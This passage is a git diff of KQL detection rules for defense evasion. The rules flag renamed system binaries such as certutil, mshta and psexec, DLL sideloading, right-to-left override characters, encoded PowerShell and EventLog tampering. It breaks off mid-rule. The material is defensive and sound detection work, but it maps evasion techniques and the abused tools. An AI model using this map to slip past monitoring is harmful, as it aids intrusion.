ProcessCommandLine contains "👩🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏾" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql index 969840b0..cf1fc9dd 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql @@ -1,12 +1,12 @@ -// Title: Potential Defense Evasion Via Binary Rename -// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) -// Date: 2019-06-15 -// Level: medium -// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 -// False Positives: -// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist - -DeviceProcessEvents +// Title: Potential Defense Evasion Via Binary Rename +// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) +// Date: 2019-06-15 +// Level: medium +// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "7za.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7za.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql index 6f6fd84c..0505dd7f 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql @@ -1,13 +1,13 @@ -// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries -// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113 -// Date: 2019-06-15 -// Level: high -// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009 -// False Positives: -// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist -// - PsExec installed via Windows Store doesn't contain original filename field (False negative) - -DeviceProcessEvents +// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries +// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113 +// Date: 2019-06-15 +// Level: high +// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009 +// False Positives: +// - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist +// - PsExec installed via Windows Store doesn't contain original filename field (False negative) + +DeviceProcessEvents | where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "IE4UINIT.EXE", "mshta.exe", "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ie4uinit.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql index 594222d1..36d5fd90 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql @@ -1,13 +1,13 @@ -// Title: Potential Defense Evasion Via Right-to-Left Override -// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2023-02-15 -// Level: high -// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. -// This is used as an obfuscation and masquerading techniques. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.002 -// False Positives: -// - Commandlines that contains scriptures such as arabic or hebrew might make use of this character - -DeviceProcessEvents +// Title: Potential Defense Evasion Via Right-to-Left Override +// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. +// This is used as an obfuscation and masquerading techniques. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.002 +// False Positives: +// - Commandlines that contains scriptures such as arabic or hebrew might make use of this character + +DeviceProcessEvents | where ProcessCommandLine contains "\\u202e" or ProcessCommandLine contains "[U+202E]" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql index aa3c0853..aeecc73e 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbgcore_dll.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of DBGCORE.DLL -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-10-25 -// Level: medium -// Description: Detects DLL sideloading of "dbgcore.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of DBGCORE.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-10-25 +// Level: medium +// Description: Detects DLL sideloading of "dbgcore.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents | where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbgcore.dll") or FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql index 6f57d451..ba5d5ce4 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_dbghelp_dll.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of DBGHELP.DLL -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-10-25 -// Level: medium -// Description: Detects potential DLL sideloading of "dbghelp.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of DBGHELP.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-10-25 +// Level: medium +// Description: Detects potential DLL sideloading of "dbghelp.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents | where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll") or (FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbghelp.dll")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql index 24a6fe3e..e17f83f8 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-05 -// Level: medium -// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: medium +// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql index 075a86e3..44d43c37 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_classicexplorer32_dll.kql @@ -1,10 +1,10 @@ -// Title: Potential DLL Sideloading Via ClassicExplorer32.dll -// Author: frack113 -// Date: 2022-12-13 -// Level: medium -// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Via ClassicExplorer32.dll +// Author: frack113 +// Date: 2022-12-13 +// Level: medium +// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql index fa0f3ac5..a6545a1b 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_comctl32_dll.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Via comctl32.dll -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) -// Date: 2022-12-16 -// Level: high -// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Via comctl32.dll +// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) +// Date: 2022-12-16 +// Level: high +// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql index 29802420..da26d015 100644 --- a/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql +++ b/KQL/rules/Defense Evasion/potential_dll_sideloading_via_jsschhlp.kql @@ -1,10 +1,10 @@ -// Title: Potential DLL Sideloading Via JsSchHlp -// Author: frack113 -// Date: 2022-12-14 -// Level: medium -// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Via JsSchHlp +// Author: frack113 +// Date: 2022-12-14 +// Level: medium +// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql index da146b02..f4b66630 100644 --- a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql +++ b/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql @@ -1,10 +1,10 @@ -// Title: Potential Encoded PowerShell Patterns In CommandLine -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020-10-11 -// Level: low -// Description: Detects specific combinations of encoding methods in PowerShell via the commandline -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Potential Encoded PowerShell Patterns In CommandLine +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton +// Date: 2020-10-11 +// Level: low +// Description: Detects specific combinations of encoding methods in PowerShell via the commandline +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql index 737412a3..451f6f29 100644 --- a/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql +++ b/KQL/rules/Defense Evasion/potential_eventlog_file_location_tampering.kql @@ -1,10 +1,10 @@ -// Title: Potential EventLog File Location Tampering -// Author: D3F7A5105 -// Date: 2023-01-02 -// Level: high -// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 - -DeviceRegistryEvents +// Title: Potential EventLog File Location Tampering +// Author: D3F7A5105 +// Date: 2023-01-02 +// Level: high +// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceRegistryEvents | where (RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql index dba28315..540371d3 100644 --- a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql +++ b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql @@ -1,12 +1,12 @@ -// Title: Potential Fake Instance Of Hxtsr.EXE Executed -// Author: Sreeman -// Date: 2020-04-17 -// Level: medium -// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. -// HxTsr.exe is part of Outlook apps, because it resides in a hidden 